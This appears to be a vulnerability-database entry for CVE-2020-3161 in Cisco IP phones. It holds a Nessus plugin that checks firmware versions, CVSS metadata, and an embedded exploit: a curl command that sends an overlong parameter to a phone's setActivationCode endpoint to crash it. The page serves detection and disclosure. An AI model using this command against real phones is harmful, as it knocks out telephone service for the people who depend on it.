Cisco IP Phones Web Server RCE and DOS (cisco-sa-voip-phones-rce-dos-rB6EeRXs)
2020-10-06T00:00:00
ID: CISCO-SA-VOIP-PHONES-RCE-DOS-RB6EERXS.NASL
Type: nessus
Reporter: This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified: 2020-10-06T00:00:00
Description
A denial of service (DoS) and remote code execution (RCE) vulnerability exists in Cisco IP Phones due
to a lack of proper input validation of HTTP requests. An unauthenticated attacker can exploit this
vulnerability by sending a crafted HTTP request to the web server of a targeted device. A successful exploit
could allow the attacker to remotely execute code with root privileges or cause a reload of an affected IP phone,
resulting in a DoS condition.
Please see the included Cisco BIDs and Cisco Security Advisory for more information.
#
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
  script_id(141192);
  script_version("1.2");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/10/07");

  script_cve_id("CVE-2020-3161");
  script_xref(name:"CISCO-BUG-ID", value:"CSCuz03016");
  script_xref(name:"CISCO-BUG-ID", value:"CSCvs78272");
  script_xref(name:"CISCO-BUG-ID", value:"CSCvs78441");
  script_xref(name:"CISCO-SA", value:"cisco-sa-voip-phones-rce-dos-rB6EeRXs");

  script_name(english:"Cisco IP Phones Web Server RCE and DOS (cisco-sa-voip-phones-rce-dos-rB6EeRXs)");

  script_set_attribute(attribute:"synopsis", value:
"The remote IP phone has multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"A denial of service (DoS) vulnerability and remote code execution (RCE) exists in Cisco IP Phones due
to a lack of proper input validation of HTTP requests. An unauthenticated attacker can exploit this
vulnerability by sending a crafted HTTP request to the web server of a targeted device. A successful exploit
could allow the attacker to remotely execute code with root privileges or cause a reload of an affected IP phone,
resulting in a DoS condition.
Please see the included Cisco BIDs and Cisco Security Advisory for more information.");
  # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f2eef1cf");
  script_set_attribute(attribute:"solution", value:
"Apply the fix referenced in the vendor's advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-3161");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_cwe_id(20);

  script_set_attribute(attribute:"vuln_publication_date", value:"2020/04/15");
  script_set_attribute(attribute:"patch_publication_date", value:"2020/04/15");
  script_set_attribute(attribute:"plugin_publication_date", value:"2020/10/06");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"x-cpe:/h:cisco:ip_phone");
  script_set_attribute(attribute:"cpe", value:"x-cpe:/o:cisco:ip_phone");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CISCO");

  script_copyright(english:"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("cisco_ip_phone_sip_detect.nbin");
  script_require_keys("installed_sw/Cisco IP Phone");
  script_require_ports("Services/sip", "Services/udp/sip");

  exit(0);
}

include('vcf.inc');
include('vcf_extras.inc');

app = 'Cisco IP Phone';

detected_on = get_kb_list('installed_sw/*/Cisco IP Phone/service/*/SIP/Banner');

report = '';

foreach item(keys(detected_on))
{
  portproto = pregmatch(string:item, pattern:'installed_sw/([0-9]+)/Cisco IP Phone/service/([a-z]{3})/SIP/Banner');
  if (!empty_or_null(portproto))
  {
    port = portproto[1];
    proto = portproto[2];
    app_info = vcf::cisco_ip_phone::get_app_info(app:app, port:port, proto:proto);

    mod = app_info['model'];

    # IP Phone 7811, 7821, 7841, 7861 Desktop Phones
    # IP Phone 8811, 8841, 8845, 8851, 8861, 8865 Desktop Phones
    models = {
      '7811' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '7821' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '7841' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '7861' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '8811' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '8841' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '8845' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '8851' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '8861' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '8865' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '8821' : { 'constraints': [{'fixed_version' : '11.0(5)SR3', 'fixed_display' : '11.0(5)SR3, Refer to Cisco Bug ID: CSCvs78272'}]},
      '8831' : { 'constraints': [{'fixed_version' : '10.3(1)SR6', 'fixed_display' : '10.3(1)SR6, Refer to Cisco Bug ID: CSCvs78441'}]}
    };

    report += vcf::cisco_ip_phone::check_version(app_info:app_info, constraints:models[app_info.model]['constraints']);
  }
}

if (empty_or_null(report))
  audit(AUDIT_HOST_NOT, 'affected');

security_report_v4(port:port, proto:proto, severity:SECURITY_HOLE, extra:report);
{"id": "CISCO-SA-VOIP-PHONES-RCE-DOS-RB6EERXS.NASL", "bulletinFamily": "scanner", "title": "Cisco IP Phones Web Server RCE and DOS (cisco-sa-voip-phones-rce-dos-rB6EeRXs)", "description": "A denial of service (DoS) vulnerability and remote code execution (RCE) exists in Cisco IP Phones due \nto a lack of proper input validation of HTTP requests. An unauthenticated attacker can exploit this \nvulnerability by sending a crafted HTTP request to the web server of a targeted device. A successful exploit \ncould allow the attacker to remotely execute code with root privileges or cause a reload of an affected IP phone, \nresulting in a DoS condition.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.", "published": "2020-10-06T00:00:00", "modified": "2020-10-06T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/141192", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://www.nessus.org/u?f2eef1cf"], "cvelist": ["CVE-2020-3161"], "type": "nessus", "lastseen": "2020-10-08T05:23:18", "edition": 2, "viewCount": 19, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-3161"]}, {"type": "zdt", "idList": ["1337DAY-ID-34255"]}, {"type": "exploitdb", "idList": ["EDB-ID:48342"]}, {"type": "cisco", "idList": ["CISCO-SA-VOIP-PHONES-RCE-DOS-RB6EERXS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157265"]}, {"type": "threatpost", "idList": ["THREATPOST:F2B495A97075920EEF1C7328AE80CC7B"]}], "modified": "2020-10-08T05:23:18", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2020-10-08T05:23:18", "rev": 2}, "vulnersScore": 6.1}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141192);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/07\");\n\n script_cve_id(\"CVE-2020-3161\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCuz03016\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvs78272\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvs78441\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-voip-phones-rce-dos-rB6EeRXs\");\n\n script_name(english:\"Cisco IP Phones Web Server RCE and DOS (cisco-sa-voip-phones-rce-dos-rB6EeRXs)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote IP phone has multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"A denial of service (DoS) vulnerability and remote code execution (RCE) exists in Cisco IP Phones due \nto a lack of proper input validation of HTTP requests. An unauthenticated attacker can exploit this \nvulnerability by sending a crafted HTTP request to the web server of a targeted device. 
A successful exploit \ncould allow the attacker to remotely execute code with root privileges or cause a reload of an affected IP phone, \nresulting in a DoS condition.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f2eef1cf\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the fix referenced in the vendor's advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3161\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/h:cisco:ip_phone\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:cisco:ip_phone\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ip_phone_sip_detect.nbin\");\n script_require_keys(\"installed_sw/Cisco IP Phone\");\n script_require_ports(\"Services/sip\", \"Services/udp/sip\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp = 'Cisco IP Phone';\n\ndetected_on = get_kb_list('installed_sw/*/Cisco IP Phone/service/*/SIP/Banner');\n\nreport = '';\n\nforeach item(keys(detected_on))\n{\n portproto = pregmatch(string:item, pattern:'installed_sw/([0-9]+)/Cisco IP Phone/service/([a-z]{3})/SIP/Banner');\n if (!empty_or_null(portproto))\n {\n port = portproto[1];\n proto = portproto[2];\n app_info = vcf::cisco_ip_phone::get_app_info(app:app, port:port, proto:proto);\n\n mod = app_info['model'];\n\n # IP Phone 7811, 7821, 7841, 7861 Desktop Phones\t\n # IP Phone 8811, 8841, 8845, 8851, 8861, 8865 Desktop Phones\n models = {\n '7811' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},\n '7821' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},\n '7841' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},\n '7861' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},\n '8811' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},\n '8841' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},\n '8845' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},\n '8851' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},\n '8861' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: 
CSCuz03016'}]},\n '8865' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},\n '8821' : { 'constraints': [{'fixed_version' : '11.0(5)SR3', 'fixed_display' : '11.0(5)SR3, Refer to Cisco Bug ID: CSCvs78272'}]},\n '8831' : { 'constraints': [{'fixed_version' : '10.3(1)SR6', 'fixed_display' : '10.3(1)SR6, Refer to Cisco Bug ID: CSCvs78441'}]}\n };\n\n report += vcf::cisco_ip_phone::check_version(app_info:app_info, constraints:models[app_info.model]['constraints']);\n }\n}\n\nif (empty_or_null(report))\n audit(AUDIT_HOST_NOT, 'affected');\n\nsecurity_report_v4(port:port, proto:proto, severity:SECURITY_HOLE, extra:report);\n", "naslFamily": "CISCO", "pluginID": "141192", "cpe": ["x-cpe:/h:cisco:ip_phone", "x-cpe:/o:cisco:ip_phone"], "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "scheme": null}
{"cve": [{"lastseen": "2020-10-03T12:55:53", "description": "A vulnerability in the web server for Cisco IP Phones could allow an unauthenticated, remote attacker to execute code with root privileges or cause a reload of an affected IP phone, resulting in a denial of service (DoS) condition. The vulnerability is due to a lack of proper input validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web server of a targeted device. A successful exploit could allow the attacker to remotely execute code with root privileges or cause a reload of an affected IP phone, resulting in a DoS condition.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-15T20:15:00", "title": "CVE-2020-3161", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3161"], "modified": "2020-04-28T16:26:00", "cpe": ["cpe:/o:cisco:ip_phone_8865_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_8851_firmware:11.0\\(5\\)sr1", "cpe:/o:cisco:ip_phone_8861_firmware:10.3\\(1\\)es14", 
"cpe:/o:cisco:ip_phone_8811_firmware:11.0\\(5\\)sr1", "cpe:/o:cisco:ip_phone_8821_firmware:10.3\\(1\\)es14", "cpe:/o:cisco:ip_phone_8841_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_8861_firmware:11.0\\(5\\)sr1", "cpe:/o:cisco:ip_phone_8865_firmware:11.0\\(5\\)sr1", "cpe:/o:cisco:ip_phone_8845_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_8821-ex_firmware:10.3\\(1\\)es14", "cpe:/o:cisco:ip_phone_8821_firmware:11.0\\(5\\)sr1", "cpe:/o:cisco:ip_phone_8845_firmware:10.3\\(1\\)es14", "cpe:/o:cisco:ip_phone_8821-ex_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_8811_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_7861_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_8845_firmware:11.0\\(5\\)sr1", "cpe:/o:cisco:ip_phone_8841_firmware:10.3\\(1\\)es14", "cpe:/o:cisco:ip_phone_8851_firmware:10.3\\(1\\)es14", "cpe:/o:cisco:ip_phone_8851_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_8821-ex_firmware:11.0\\(5\\)sr1", "cpe:/o:cisco:ip_phone_7821_firmware:11.0\\(1\\)", "cpe:/o:cisco:8831_firmware:11.0\\(5\\)sr1", "cpe:/o:cisco:8831_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_7841_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_8841_firmware:11.0\\(5\\)sr1", "cpe:/o:cisco:ip_phone_8861_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_7811_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_8865_firmware:10.3\\(1\\)es14", "cpe:/o:cisco:ip_phone_8821_firmware:11.0\\(1\\)", "cpe:/o:cisco:8831_firmware:10.3\\(1\\)es14", "cpe:/o:cisco:ip_phone_8811_firmware:10.3\\(1\\)es14"], "id": "CVE-2020-3161", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-3161", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:ip_phone_8865_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:8831_firmware:10.3\\(1\\)es14:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8811_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_7861_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8865_firmware:10.3\\(1\\)es14:*:*:*:*:*:*:*", 
"cpe:2.3:o:cisco:ip_phone_8865_firmware:11.0\\(5\\)sr1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_7841_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8821_firmware:11.0\\(5\\)sr1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8841_firmware:10.3\\(1\\)es14:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8811_firmware:11.0\\(5\\)sr1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_7811_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_7821_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8845_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8841_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8861_firmware:11.0\\(5\\)sr1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8861_firmware:10.3\\(1\\)es14:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8851_firmware:10.3\\(1\\)es14:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8851_firmware:11.0\\(5\\)sr1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8845_firmware:10.3\\(1\\)es14:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8821-ex_firmware:11.0\\(5\\)sr1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8851_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8821-ex_firmware:10.3\\(1\\)es14:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8821_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:8831_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8845_firmware:11.0\\(5\\)sr1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8821_firmware:10.3\\(1\\)es14:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8821-ex_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8861_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8811_firmware:10.3\\(1\\)es14:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8841_firmware:11.0\\(5\\)sr1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:8831_firmware:11.0\\(5\\)sr1:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2020-07-19T20:02:06", "description": "Exploit for hardware platform in category web applications", "edition": 1, "published": "2020-04-18T00:00:00", "title": 
"Cisco IP Phone 11.7 - Denial of service Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-3161"], "modified": "2020-04-18T00:00:00", "id": "1337DAY-ID-34255", "href": "https://0day.today/exploit/description/34255", "sourceData": "# Exploit Title: Cisco IP Phone 11.7 - Denial of Service (PoC)\r\n# Date: 2020-04-15\r\n# Exploit Author: Jacob Baines\r\n# Vendor Homepage: https://www.cisco.com\r\n# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html\r\n# Version: Before 11.7(1)\r\n# Tested on: Cisco Wireless IP Phone 8821\r\n# CVE: CVE-2020-3161\r\n# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs\r\n# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24\r\n\r\ncurl -v --path-as-is --insecure\r\nhttps://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n\n# 0day.today [2020-07-19] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34255"}], "packetstorm": [{"lastseen": "2020-04-20T07:51:59", "description": "", "published": "2020-04-17T00:00:00", "type": "packetstorm", "title": "Cisco IP Phone 11.7 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-3161"], "modified": "2020-04-17T00:00:00", "id": "PACKETSTORM:157265", "href": "https://packetstormsecurity.com/files/157265/Cisco-IP-Phone-11.7-Denial-Of-Service.html", "sourceData": "`# Exploit Title: Cisco IP 
Phone 11.7 - Denial of Service (PoC) \n# Date: 2020-04-15 \n# Exploit Author: Jacob Baines \n# Vendor Homepage: https://www.cisco.com \n# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html \n# Version: Before 11.7(1) \n# Tested on: Cisco Wireless IP Phone 8821 \n# CVE: CVE-2020-3161 \n# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs \n# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24 \n \ncurl -v --path-as-is --insecure 